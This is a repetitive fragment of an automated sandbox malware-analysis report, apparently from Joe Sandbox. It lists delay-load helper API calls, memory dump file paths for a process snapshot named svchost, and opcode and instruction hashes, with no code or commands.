                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0084E51F
                                                              • Part of subcall function 0084E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0084E8D0
                                                              • Part of subcall function 0084E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0084E8E1
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 05b7e364d5514ade24a2ac403100f18e036da3269cbfbe33fbc23d5455baecff
                                                            • Instruction ID: a7ada315ca80715e7c23be43bf57af737ebc305b207b563f957883002337924b
                                                            • Opcode Fuzzy Hash: 05b7e364d5514ade24a2ac403100f18e036da3269cbfbe33fbc23d5455baecff
                                                            • Instruction Fuzzy Hash: 53B012C165850C7D3904714D5C02D3B414CF4C1F14331403EF416C0180E8400C040533
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0084E51F
                                                              • Part of subcall function 0084E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0084E8D0
                                                              • Part of subcall function 0084E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0084E8E1
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: cf75758f51c8c6ad2c6f07275478db587d6711eb0735f684245fef660087bf43
                                                            • Instruction ID: 7f3ebbecf67778ec228e4b03edbd1346503ffbadaa79a04fcce802cbc67745f0
                                                            • Opcode Fuzzy Hash: cf75758f51c8c6ad2c6f07275478db587d6711eb0735f684245fef660087bf43
                                                            • Instruction Fuzzy Hash: 5AB012C165850C7C3A04714D9C03C3B410CF4D1F14331423EF417C0180E8400C480537
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0084E1E3
                                                              • Part of subcall function 0084E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0084E8D0
                                                              • Part of subcall function 0084E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0084E8E1
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: d32389fb27da4c34e684dbff98890d613d9aec3d49f8c5e16ef6807777dc27d2
                                                            • Instruction ID: cd8867ef2cfa5067298bb2866db0e6006cf414f4149caa5726151492fede5ffe
                                                            • Opcode Fuzzy Hash: d32389fb27da4c34e684dbff98890d613d9aec3d49f8c5e16ef6807777dc27d2
                                                            • Instruction Fuzzy Hash: E5A011E22A800EBC300822022C0BC3B020CF0C8B22330883EF8A3C0080A88038000832
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0084E1E3
                                                              • Part of subcall function 0084E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0084E8D0
                                                              • Part of subcall function 0084E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0084E8E1
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 881d4937c1b1a97481edce0e3ab5f35a136c428cc70589ed63906ca33080fbf2
                                                            • Instruction ID: cd8867ef2cfa5067298bb2866db0e6006cf414f4149caa5726151492fede5ffe
                                                            • Opcode Fuzzy Hash: 881d4937c1b1a97481edce0e3ab5f35a136c428cc70589ed63906ca33080fbf2
                                                            • Instruction Fuzzy Hash: E5A011E22A800EBC300822022C0BC3B020CF0C8B22330883EF8A3C0080A88038000832
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0084E1E3
                                                              • Part of subcall function 0084E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0084E8D0
                                                              • Part of subcall function 0084E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0084E8E1
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: c7f5bae56c267d96f67e33311212b4f1f63fbe492a29ecf73348a7bd1b4d41d0
                                                            • Instruction ID: cd8867ef2cfa5067298bb2866db0e6006cf414f4149caa5726151492fede5ffe
                                                            • Opcode Fuzzy Hash: c7f5bae56c267d96f67e33311212b4f1f63fbe492a29ecf73348a7bd1b4d41d0
                                                            • Instruction Fuzzy Hash: E5A011E22A800EBC300822022C0BC3B020CF0C8B22330883EF8A3C0080A88038000832
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0084E1E3
                                                              • Part of subcall function 0084E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0084E8D0
                                                              • Part of subcall function 0084E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0084E8E1
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: c195487a670e1500de4a333264f76eb95284f8053c83b5992fd2de0192458aed
                                                            • Instruction ID: cd8867ef2cfa5067298bb2866db0e6006cf414f4149caa5726151492fede5ffe
                                                            • Opcode Fuzzy Hash: c195487a670e1500de4a333264f76eb95284f8053c83b5992fd2de0192458aed
                                                            • Instruction Fuzzy Hash: E5A011E22A800EBC300822022C0BC3B020CF0C8B22330883EF8A3C0080A88038000832
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0084E1E3
                                                              • Part of subcall function 0084E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0084E8D0
                                                              • Part of subcall function 0084E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0084E8E1
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: a9b78852c1a6696f1bd575ab99d4ae2754c02c42d2f0d1f140746ec34cb3b646
                                                            • Instruction ID: cd8867ef2cfa5067298bb2866db0e6006cf414f4149caa5726151492fede5ffe
                                                            • Opcode Fuzzy Hash: a9b78852c1a6696f1bd575ab99d4ae2754c02c42d2f0d1f140746ec34cb3b646
                                                            • Instruction Fuzzy Hash: E5A011E22A800EBC300822022C0BC3B020CF0C8B22330883EF8A3C0080A88038000832
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0084E1E3
                                                              • Part of subcall function 0084E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0084E8D0
                                                              • Part of subcall function 0084E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0084E8E1
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 32925dd957999d336be550bca440531fb1dbbe8a1204dbea6ee57596641366f0
                                                            • Instruction ID: cd8867ef2cfa5067298bb2866db0e6006cf414f4149caa5726151492fede5ffe
                                                            • Opcode Fuzzy Hash: 32925dd957999d336be550bca440531fb1dbbe8a1204dbea6ee57596641366f0
                                                            • Instruction Fuzzy Hash: E5A011E22A800EBC300822022C0BC3B020CF0C8B22330883EF8A3C0080A88038000832
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0084E1E3
                                                              • Part of subcall function 0084E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0084E8D0
                                                              • Part of subcall function 0084E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0084E8E1
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: e8b573f0acffa2906a15978feb7c239e5a83972c0005ece77030dffeb654b7ce
                                                            • Instruction ID: cd8867ef2cfa5067298bb2866db0e6006cf414f4149caa5726151492fede5ffe
                                                            • Opcode Fuzzy Hash: e8b573f0acffa2906a15978feb7c239e5a83972c0005ece77030dffeb654b7ce
                                                            • Instruction Fuzzy Hash: E5A011E22A800EBC300822022C0BC3B020CF0C8B22330883EF8A3C0080A88038000832
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0084E1E3
                                                              • Part of subcall function 0084E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0084E8D0
                                                              • Part of subcall function 0084E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0084E8E1
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: b40327fd0eba8140166ad77cba140ebedf0aaec7492adca5ec9a598b5517cd2b
                                                            • Instruction ID: cd8867ef2cfa5067298bb2866db0e6006cf414f4149caa5726151492fede5ffe
                                                            • Opcode Fuzzy Hash: b40327fd0eba8140166ad77cba140ebedf0aaec7492adca5ec9a598b5517cd2b
                                                            • Instruction Fuzzy Hash: E5A011E22A800EBC300822022C0BC3B020CF0C8B22330883EF8A3C0080A88038000832
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0084E1E3
                                                              • Part of subcall function 0084E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0084E8D0
                                                              • Part of subcall function 0084E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0084E8E1
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 72213c1ac7d06fec0fc88ff8d5d974e0e9187f0c0a6a4da1ae732d2f2274ba12
                                                            • Instruction ID: cd8867ef2cfa5067298bb2866db0e6006cf414f4149caa5726151492fede5ffe
                                                            • Opcode Fuzzy Hash: 72213c1ac7d06fec0fc88ff8d5d974e0e9187f0c0a6a4da1ae732d2f2274ba12
                                                            • Instruction Fuzzy Hash: E5A011E22A800EBC300822022C0BC3B020CF0C8B22330883EF8A3C0080A88038000832
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0084E1E3
                                                              • Part of subcall function 0084E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0084E8D0
                                                              • Part of subcall function 0084E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0084E8E1
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 3c57b132ca9b59cca4cba8ac05c6578cb215802a345694e8c672c827b777305a
                                                            • Instruction ID: cd8867ef2cfa5067298bb2866db0e6006cf414f4149caa5726151492fede5ffe
                                                            • Opcode Fuzzy Hash: 3c57b132ca9b59cca4cba8ac05c6578cb215802a345694e8c672c827b777305a
                                                            • Instruction Fuzzy Hash: E5A011E22A800EBC300822022C0BC3B020CF0C8B22330883EF8A3C0080A88038000832
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0084E1E3
                                                              • Part of subcall function 0084E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0084E8D0
                                                              • Part of subcall function 0084E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0084E8E1
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 05114a21a03076e1ee613d9fc0193913c61b1705d0aaa7a9e622acde052281b1
                                                            • Instruction ID: cd8867ef2cfa5067298bb2866db0e6006cf414f4149caa5726151492fede5ffe
                                                            • Opcode Fuzzy Hash: 05114a21a03076e1ee613d9fc0193913c61b1705d0aaa7a9e622acde052281b1
                                                            • Instruction Fuzzy Hash: E5A011E22A800EBC300822022C0BC3B020CF0C8B22330883EF8A3C0080A88038000832
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0084E3FC
                                                              • Part of subcall function 0084E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0084E8D0
                                                              • Part of subcall function 0084E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0084E8E1
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 8bbdccf8ca14e9834e12cac00aa9c2419d2fa62c71eb9947cb7c815486533828
                                                            • Instruction ID: 1a1b56262d9fdacb30d47008734466aa4258b2a016767fadd8acaea5299e3c7b
                                                            • Opcode Fuzzy Hash: 8bbdccf8ca14e9834e12cac00aa9c2419d2fa62c71eb9947cb7c815486533828
                                                            • Instruction Fuzzy Hash: C6A011F22A800E3C3008A200AE02C3B020CF0C0B28330802EF822E0280AC8008000833
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0084E3FC
                                                              • Part of subcall function 0084E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0084E8D0
                                                              • Part of subcall function 0084E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0084E8E1
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 18346b9ea14d82bf257d0309531c648ba77df6202606aeabf31449d6defc2b42
                                                            • Instruction ID: b92b4b10885da46b1e8dfed69e8ec6b6a894b21c4b8a50d6173d8bfaa8f7a404
                                                            • Opcode Fuzzy Hash: 18346b9ea14d82bf257d0309531c648ba77df6202606aeabf31449d6defc2b42
                                                            • Instruction Fuzzy Hash: 63A011F22A800EBC3008A200AE02C3B020CF0C0B20330882EF822C0280A88008000833
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0084E3FC
                                                              • Part of subcall function 0084E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0084E8D0
                                                              • Part of subcall function 0084E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0084E8E1
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 7c27df7ffb2ed32b8c8eadb5a7c281e2698336baa5ac74b8a19064c29cff488c
                                                            • Instruction ID: b92b4b10885da46b1e8dfed69e8ec6b6a894b21c4b8a50d6173d8bfaa8f7a404
                                                            • Opcode Fuzzy Hash: 7c27df7ffb2ed32b8c8eadb5a7c281e2698336baa5ac74b8a19064c29cff488c
                                                            • Instruction Fuzzy Hash: 63A011F22A800EBC3008A200AE02C3B020CF0C0B20330882EF822C0280A88008000833
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0084E3FC
                                                              • Part of subcall function 0084E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0084E8D0
                                                              • Part of subcall function 0084E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0084E8E1
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmp
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmp
